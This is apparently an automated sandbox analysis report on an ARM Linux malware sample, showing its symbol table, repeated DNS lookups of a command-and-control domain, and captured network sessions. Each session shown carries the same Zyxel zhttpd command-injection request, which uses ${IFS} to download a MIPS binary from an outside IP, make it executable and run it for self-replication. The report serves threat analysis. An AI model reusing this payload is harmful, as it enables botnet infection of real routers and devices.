                                      __aeabi_d2uiz.symtab0x223c884FUNC<unknown>HIDDEN2
                                      __aeabi_dadd.symtab0x219dc784FUNC<unknown>HIDDEN2
                                      __aeabi_dcmpeq.symtab0x2235024FUNC<unknown>HIDDEN2
                                      __aeabi_dcmpge.symtab0x2239824FUNC<unknown>HIDDEN2
                                      __aeabi_dcmpgt.symtab0x223b024FUNC<unknown>HIDDEN2
                                      __aeabi_dcmple.symtab0x2238024FUNC<unknown>HIDDEN2
                                      __aeabi_dcmplt.symtab0x2236824FUNC<unknown>HIDDEN2
                                      __aeabi_ddiv.symtab0x2207c524FUNC<unknown>HIDDEN2
                                      __aeabi_dmul.symtab0x21dec656FUNC<unknown>HIDDEN2
                                      __aeabi_drsub.symtab0x219d00FUNC<unknown>HIDDEN2
                                      __aeabi_dsub.symtab0x219d8788FUNC<unknown>HIDDEN2
                                      __aeabi_f2d.symtab0x21d3864FUNC<unknown>HIDDEN2
                                      __aeabi_i2d.symtab0x21d1040FUNC<unknown>HIDDEN2
                                      __aeabi_idiv.symtab0x157600FUNC<unknown>HIDDEN2
                                      __aeabi_idivmod.symtab0x1588c24FUNC<unknown>HIDDEN2
                                      __aeabi_l2d.symtab0x21d8c96FUNC<unknown>HIDDEN2
                                      __aeabi_read_tp.symtab0x111a08FUNC<unknown>HIDDEN2
                                      __aeabi_ui2d.symtab0x21cec36FUNC<unknown>HIDDEN2
                                      __aeabi_uidiv.symtab0x1564c0FUNC<unknown>HIDDEN2
                                      __aeabi_uidivmod.symtab0x1574824FUNC<unknown>HIDDEN2
                                      __aeabi_ul2d.symtab0x21d78116FUNC<unknown>HIDDEN2
                                      __aeabi_unwind_cpp_pr0.symtab0x1656c8FUNC<unknown>HIDDEN2
                                      __aeabi_unwind_cpp_pr1.symtab0x165648FUNC<unknown>HIDDEN2
                                      __aeabi_unwind_cpp_pr2.symtab0x1655c8FUNC<unknown>HIDDEN2
                                      __app_fini.symtab0x321ac4OBJECT<unknown>HIDDEN15
                                      __atexit_lock.symtab0x2d3ac24OBJECT<unknown>DEFAULT14
                                      __bss_end__.symtab0x326380NOTYPE<unknown>DEFAULTSHN_ABS
                                      __bss_start.symtab0x2d3dc0NOTYPE<unknown>DEFAULTSHN_ABS
                                      __bss_start__.symtab0x2d3dc0NOTYPE<unknown>DEFAULTSHN_ABS
                                      __check_one_fd.symtab0x1e91084FUNC<unknown>DEFAULT2
                                      __clone.symtab0x1d318100FUNC<unknown>DEFAULT2
                                      __close.symtab0x1db10100FUNC<unknown>DEFAULT2
                                      __close_nocancel.symtab0x1daf424FUNC<unknown>DEFAULT2
                                      __cmpdf2.symtab0x22298132FUNC<unknown>HIDDEN2
                                      __ctype_b.symtab0x2d3d84OBJECT<unknown>DEFAULT14
                                      __curbrk.symtab0x321b44OBJECT<unknown>HIDDEN15
                                      __cxa_begin_cleanup.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                      __cxa_call_unexpected.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                      __cxa_type_match.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                      __data_start.symtab0x2d0d40NOTYPE<unknown>DEFAULT14
                                      __deallocate_stack.symtab0x11cbc304FUNC<unknown>HIDDEN2
                                      __default_rt_sa_restorer.symtab0x16f200FUNC<unknown>DEFAULT2
                                      __default_sa_restorer.symtab0x16f140FUNC<unknown>DEFAULT2
                                      __default_stacksize.symtab0x2d1d84OBJECT<unknown>HIDDEN14
                                      __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                      __div0.symtab0x158a420FUNC<unknown>HIDDEN2
                                      __divdf3.symtab0x2207c524FUNC<unknown>HIDDEN2
                                      __divsi3.symtab0x15760300FUNC<unknown>HIDDEN2
                                      __do_global_dtors_aux.symtab0x80f00FUNC<unknown>DEFAULT2
                                      __do_global_dtors_aux_fini_array_entry.symtab0x2d00c0OBJECT<unknown>DEFAULT11
                                      __end__.symtab0x326380NOTYPE<unknown>DEFAULTSHN_ABS
                                      __environ.symtab0x321a44OBJECT<unknown>DEFAULT15
                                      __eqdf2.symtab0x22298132FUNC<unknown>HIDDEN2
                                      __errno_location.symtab0x111fc32FUNC<unknown>DEFAULT2
                                      __error.symtab0x1d3780NOTYPE<unknown>DEFAULT2
                                      __exidx_end.symtab0x24c800NOTYPE<unknown>DEFAULTSHN_ABS
                                      __exidx_start.symtab0x24b100NOTYPE<unknown>DEFAULTSHN_ABS
                                      __exit_cleanup.symtab0x317184OBJECT<unknown>HIDDEN15
                                      __extendsfdf2.symtab0x21d3864FUNC<unknown>HIDDEN2
                                      __fcntl_nocancel.symtab0x16f28152FUNC<unknown>DEFAULT2
                                      __fgetc_unlocked.symtab0x206bc300FUNC<unknown>DEFAULT2
                                      __find_in_stack_list.symtab0x114b0308FUNC<unknown>HIDDEN2
                                      __fini_array_end.symtab0x2d0100NOTYPE<unknown>HIDDEN11
                                      __fini_array_start.symtab0x2d00c0NOTYPE<unknown>HIDDEN11
                                      __fixunsdfsi.symtab0x223c884FUNC<unknown>HIDDEN2
                                      __floatdidf.symtab0x21d8c96FUNC<unknown>HIDDEN2
                                      __floatsidf.symtab0x21d1040FUNC<unknown>HIDDEN2
                                      __floatundidf.symtab0x21d78116FUNC<unknown>HIDDEN2
                                      __floatunsidf.symtab0x21cec36FUNC<unknown>HIDDEN2
                                      __fork.symtab0x1107424FUNC<unknown>DEFAULT2
                                      __fork_generation.symtab0x322284OBJECT<unknown>HIDDEN15
                                      __fork_generation_pointer.symtab0x326044OBJECT<unknown>HIDDEN15
                                      __fork_handlers.symtab0x326084OBJECT<unknown>HIDDEN15
                                      __fork_lock.symtab0x3171c4OBJECT<unknown>HIDDEN15
                                      __frame_dummy_init_array_entry.symtab0x2d0080OBJECT<unknown>DEFAULT10
                                      __free_stacks.symtab0x11c18164FUNC<unknown>HIDDEN2
                                      __free_tcb.symtab0x11dec116FUNC<unknown>HIDDEN2
                                      __gedf2.symtab0x22288148FUNC<unknown>HIDDEN2
                                      __getdents.symtab0x1ee58160FUNC<unknown>HIDDEN2
                                      __getdents64.symtab0x21354328FUNC<unknown>HIDDEN2
                                      __getpagesize.symtab0x1715c40FUNC<unknown>DEFAULT2
                                      __getpid.symtab0x1d97872FUNC<unknown>DEFAULT2
                                      __glibc_strerror_r.symtab0x1a5c024FUNC<unknown>DEFAULT2
                                      __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                      __gnu_Unwind_Find_exidx.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                      __gnu_Unwind_ForcedUnwind.symtab0x15d1028FUNC<unknown>HIDDEN2
                                      __gnu_Unwind_RaiseException.symtab0x15df8184FUNC<unknown>HIDDEN2
                                      __gnu_Unwind_Restore_VFP.symtab0x165900FUNC<unknown>HIDDEN2
                                      __gnu_Unwind_Resume.symtab0x15d8c108FUNC<unknown>HIDDEN2
                                      __gnu_Unwind_Resume_or_Rethrow.symtab0x15eb032FUNC<unknown>HIDDEN2
                                      __gnu_Unwind_Save_VFP.symtab0x165980FUNC<unknown>HIDDEN2
                                      __gnu_unwind_execute.symtab0x166741812FUNC<unknown>HIDDEN2
                                      __gnu_unwind_frame.symtab0x16d8872FUNC<unknown>HIDDEN2
                                      __gnu_unwind_pr_common.symtab0x160141352FUNC<unknown>DEFAULT2
                                      __gtdf2.symtab0x22288148FUNC<unknown>HIDDEN2
                                      __h_errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                      __init_array_end.symtab0x2d00c0NOTYPE<unknown>HIDDEN10
                                      __init_array_start.symtab0x2d0080NOTYPE<unknown>HIDDEN10
                                      __init_sched_fifo_prio.symtab0x14ab476FUNC<unknown>HIDDEN2
                                      __is_smp.symtab0x322204OBJECT<unknown>HIDDEN15
                                      __ledf2.symtab0x22290140FUNC<unknown>HIDDEN2
                                      __libc_accept.symtab0x1a820116FUNC<unknown>DEFAULT2
                                      __libc_close.symtab0x1db10100FUNC<unknown>DEFAULT2
                                      __libc_connect.symtab0x1a91c116FUNC<unknown>DEFAULT2
                                      __libc_disable_asynccancel.symtab0x1dd30136FUNC<unknown>HIDDEN2
                                      __libc_enable_asynccancel.symtab0x1ddb8220FUNC<unknown>HIDDEN2
                                      __libc_errno.symtab0x44TLS<unknown>HIDDEN9
                                      __libc_fcntl.symtab0x16fc0244FUNC<unknown>DEFAULT2
                                      __libc_fork.symtab0x1d37c972FUNC<unknown>DEFAULT2
                                      __libc_h_errno.symtab0x84TLS<unknown>HIDDEN9
                                      __libc_longjmp.symtab0x1724856FUNC<unknown>DEFAULT2
                                      __libc_multiple_threads.symtab0x3260c4OBJECT<unknown>HIDDEN15
                                      __libc_multiple_threads_ptr.symtab0x3221c4OBJECT<unknown>HIDDEN15
                                      __libc_nanosleep.symtab0x1738096FUNC<unknown>DEFAULT2
                                      __libc_open.symtab0x1dba0100FUNC<unknown>DEFAULT2
                                      __libc_pthread_init.symtab0x1d74868FUNC<unknown>DEFAULT2
                                      __libc_read.symtab0x1dcc0100FUNC<unknown>DEFAULT2
                                      __libc_recv.symtab0x1aaa0112FUNC<unknown>DEFAULT2
                                      __libc_recvfrom.symtab0x1ab58136FUNC<unknown>DEFAULT2
                                      __libc_resp.symtab0x04TLS<unknown>HIDDEN8
                                      __libc_select.symtab0x175d0132FUNC<unknown>DEFAULT2
                                      __libc_send.symtab0x1ac24112FUNC<unknown>DEFAULT2
                                      __libc_sendto.symtab0x1ace0136FUNC<unknown>DEFAULT2
                                      __libc_setup_tls.symtab0x1df98560FUNC<unknown>DEFAULT2
                                      __libc_sigaction.symtab0x16e80136FUNC<unknown>DEFAULT2
                                      __libc_siglongjmp.symtab0x1724856FUNC<unknown>DEFAULT2
                                      __libc_stack_end.symtab0x321a04OBJECT<unknown>DEFAULT15
                                      __libc_write.symtab0x1dc30100FUNC<unknown>DEFAULT2
                                      __linkin_atfork.symtab0x1d78c100FUNC<unknown>HIDDEN2
                                      __lll_lock_wait.symtab0x144ac156FUNC<unknown>HIDDEN2
                                      __lll_lock_wait_private.symtab0x14414152FUNC<unknown>HIDDEN2
                                      __lll_robust_lock_wait.symtab0x1489c208FUNC<unknown>HIDDEN2
                                      __lll_robust_timedlock_wait.symtab0x14750332FUNC<unknown>HIDDEN2
                                      __lll_timedlock_wait.symtab0x14620304FUNC<unknown>HIDDEN2
                                      __lll_timedwait_tid.symtab0x14548216FUNC<unknown>HIDDEN2
                                      __longjmp.symtab0x1edd420FUNC<unknown>DEFAULT2
                                      __ltdf2.symtab0x22290140FUNC<unknown>HIDDEN2
                                      __make_stacks_executable.symtab0x11adc8FUNC<unknown>HIDDEN2
                                      __malloc_consolidate.symtab0x1bd54436FUNC<unknown>HIDDEN2
                                      __malloc_largebin_index.symtab0x1adf4120FUNC<unknown>DEFAULT2
                                      __malloc_lock.symtab0x2d2d024OBJECT<unknown>DEFAULT14
                                      __malloc_state.symtab0x3228c888OBJECT<unknown>DEFAULT15
                                      __malloc_trim.symtab0x1bca4176FUNC<unknown>DEFAULT2
                                      __muldf3.symtab0x21dec656FUNC<unknown>HIDDEN2
                                      __nedf2.symtab0x22298132FUNC<unknown>HIDDEN2
                                      __nptl_create_event.symtab0x151084FUNC<unknown>DEFAULT2
                                      __nptl_deallocate_tsd.symtab0x11ae4308FUNC<unknown>HIDDEN2
                                      __nptl_death_event.symtab0x1510c4FUNC<unknown>DEFAULT2
                                      __nptl_initial_report_events.symtab0x2f50c1OBJECT<unknown>DEFAULT15
                                      __nptl_last_event.symtab0x2d4fc4OBJECT<unknown>DEFAULT15
                                      __nptl_nthreads.symtab0x2d1c44OBJECT<unknown>DEFAULT14
                                      __nptl_setxid.symtab0x117e4688FUNC<unknown>HIDDEN2
                                      __nptl_threads_events.symtab0x2d4f48OBJECT<unknown>DEFAULT15
                                      __open.symtab0x1dba0100FUNC<unknown>DEFAULT2
                                      __open_nocancel.symtab0x1db8424FUNC<unknown>DEFAULT2
                                      __pagesize.symtab0x321a84OBJECT<unknown>DEFAULT15
                                      __preinit_array_end.symtab0x2d0080NOTYPE<unknown>HIDDEN9
                                      __preinit_array_start.symtab0x2d0080NOTYPE<unknown>HIDDEN9
                                      __progname.symtab0x2d3cc4OBJECT<unknown>DEFAULT14
                                      __progname_full.symtab0x2d3d04OBJECT<unknown>DEFAULT14
                                      __pthread_cleanup_pop.symtab0x14f3c56FUNC<unknown>HIDDEN2
                                      __pthread_cleanup_pop_restore.symtab0x15018240FUNC<unknown>DEFAULT2
                                      __pthread_cleanup_push.symtab0x14f7440FUNC<unknown>HIDDEN2
                                      __pthread_cleanup_push_defer.symtab0x14f9c124FUNC<unknown>DEFAULT2
                                      __pthread_create_2_1.symtab0x124ac2692FUNC<unknown>DEFAULT2
                                      __pthread_current_priority.symtab0x14974320FUNC<unknown>HIDDEN2
                                      __pthread_debug.symtab0x322184OBJECT<unknown>HIDDEN15
                                      __pthread_disable_asynccancel.symtab0x14dec136FUNC<unknown>HIDDEN2
                                      __pthread_enable_asynccancel.symtab0x14e74200FUNC<unknown>HIDDEN2
                                      __pthread_init_static_tls.symtab0x12f30412FUNC<unknown>HIDDEN2
                                      __pthread_initialize_minimal.symtab0x1535c752FUNC<unknown>DEFAULT2
                                      __pthread_initialize_minimal_internal.symtab0x1535c752FUNC<unknown>HIDDEN2
                                      __pthread_keys.symtab0x2d5088192OBJECT<unknown>DEFAULT15
                                      __pthread_multiple_threads.symtab0x322244OBJECT<unknown>HIDDEN15
                                      __pthread_mutex_lock.symtab0x13a30576FUNC<unknown>PROTECTED2
                                      __pthread_mutex_lock_full.symtab0x1347c1460FUNC<unknown>DEFAULT2
                                      __pthread_mutex_lock_internal.symtab0x13a30576FUNC<unknown>HIDDEN2
                                      __pthread_mutex_unlock.symtab0x1427c8FUNC<unknown>PROTECTED2
                                      __pthread_mutex_unlock_full.symtab0x13c701264FUNC<unknown>DEFAULT2
                                      __pthread_mutex_unlock_internal.symtab0x1427c8FUNC<unknown>HIDDEN2
                                      __pthread_mutex_unlock_usercnt.symtab0x14160284FUNC<unknown>HIDDEN2
                                      __pthread_return_0.symtab0x1e8508FUNC<unknown>DEFAULT2
                                      __pthread_tpp_change_priority.symtab0x14b00748FUNC<unknown>HIDDEN2
                                      __pthread_unwind.symtab0x1428484FUNC<unknown>DEFAULT2
                                      __pthread_unwind_next.symtab0x142d816FUNC<unknown>DEFAULT2
                                      __read.symtab0x1dcc0100FUNC<unknown>DEFAULT2
                                      __read_nocancel.symtab0x1dca424FUNC<unknown>DEFAULT2
                                      __reclaim_stacks.symtab0x130cc548FUNC<unknown>HIDDEN2
                                      __register_atfork.symtab0x1d7f0392FUNC<unknown>DEFAULT2
                                      __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                      __resp.symtab0x04TLS<unknown>DEFAULT8
                                      __restore_core_regs.symtab0x1657428FUNC<unknown>HIDDEN2
                                      __rtld_fini.symtab0x321b04OBJECT<unknown>HIDDEN15
                                      __sched_fifo_max_prio.symtab0x2d1e04OBJECT<unknown>HIDDEN14
                                      __sched_fifo_min_prio.symtab0x2d1dc4OBJECT<unknown>HIDDEN14
                                      __set_robust_list_avail.symtab0x322344OBJECT<unknown>HIDDEN15
                                      __sigaction.symtab0x111b076FUNC<unknown>DEFAULT2
                                      __sigjmp_save.symtab0x212bc64FUNC<unknown>HIDDEN2
                                      __sigsetjmp.symtab0x1ede812FUNC<unknown>DEFAULT2
                                      __stack_user.symtab0x2d4e88OBJECT<unknown>DEFAULT15
                                      __static_tls_align_m1.symtab0x3222c4OBJECT<unknown>HIDDEN15
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jan 19, 2024 17:28:38.172831059 CET192.168.2.148.8.8.80xe626Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:28:43.932876110 CET192.168.2.148.8.8.80xc020Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:28:46.056894064 CET192.168.2.148.8.8.80xd9dbStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:28:54.826319933 CET192.168.2.148.8.8.80xa9f1Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:29:04.590109110 CET192.168.2.148.8.8.80x5e14Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:29:09.349956989 CET192.168.2.148.8.8.80xe683Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:29:19.115690947 CET192.168.2.148.8.8.80xea3aStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:29:25.876935959 CET192.168.2.148.8.8.80x1505Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:29:35.637293100 CET192.168.2.148.8.8.80x4b0fStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:29:43.398473024 CET192.168.2.148.8.8.80x51f7Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:29:50.169133902 CET192.168.2.148.8.8.80x12f1Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:29:58.939908981 CET192.168.2.148.8.8.80xe7b4Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:30:06.699981928 CET192.168.2.148.8.8.80x1359Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:30:13.457029104 CET192.168.2.148.8.8.80x9b01Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:30:20.230144978 CET192.168.2.148.8.8.80xc45cStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:30:31.003218889 CET192.168.2.148.8.8.80x3ec2Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:30:35.771743059 CET192.168.2.148.8.8.80x6655Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:30:41.536999941 CET192.168.2.148.8.8.80x42faStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jan 19, 2024 17:28:38.276618958 CET8.8.8.8192.168.2.140xe626No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:28:44.391165018 CET8.8.8.8192.168.2.140xc020No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:28:46.160713911 CET8.8.8.8192.168.2.140xd9dbNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:28:54.935461044 CET8.8.8.8192.168.2.140xa9f1No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:29:04.697559118 CET8.8.8.8192.168.2.140x5e14No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:29:09.453668118 CET8.8.8.8192.168.2.140xe683No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:29:19.220546961 CET8.8.8.8192.168.2.140xea3aNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:29:25.981060982 CET8.8.8.8192.168.2.140x1505No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:29:35.741105080 CET8.8.8.8192.168.2.140x4b0fNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:29:43.502094030 CET8.8.8.8192.168.2.140x51f7No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:29:50.272543907 CET8.8.8.8192.168.2.140x12f1No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:29:59.043598890 CET8.8.8.8192.168.2.140xe7b4No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:30:06.803736925 CET8.8.8.8192.168.2.140x1359No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:30:13.561647892 CET8.8.8.8192.168.2.140x9b01No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:30:20.333920002 CET8.8.8.8192.168.2.140xc45cNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:30:31.107145071 CET8.8.8.8192.168.2.140x3ec2No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:30:35.875425100 CET8.8.8.8192.168.2.140x6655No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Jan 19, 2024 17:30:41.640642881 CET8.8.8.8192.168.2.140x42faNo error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                      Session IDSource IPSource PortDestination IPDestination Port
                                      0192.168.2.1460950112.138.236.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.233311892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1192.168.2.1433172117.57.220.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.233552933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2192.168.2.1457066132.168.77.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.233620882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3192.168.2.1434946125.165.127.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.233697891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4192.168.2.1447748123.13.69.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.233772993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5192.168.2.1449202202.176.203.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.233822107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6192.168.2.1458680164.45.24.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.233879089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7192.168.2.144837414.7.99.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.233980894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8192.168.2.1451654168.128.0.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.234044075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9192.168.2.1438162178.181.128.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.234095097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10192.168.2.145859212.170.210.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.234162092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11192.168.2.1451230137.106.156.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.234242916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12192.168.2.1436264148.121.99.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.234299898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13192.168.2.145734697.242.238.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.234375000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14192.168.2.143551446.217.206.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.234416008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15192.168.2.143905441.173.116.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.234519958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16192.168.2.1436792124.239.83.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.234641075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17192.168.2.1458606126.51.131.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.234711885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
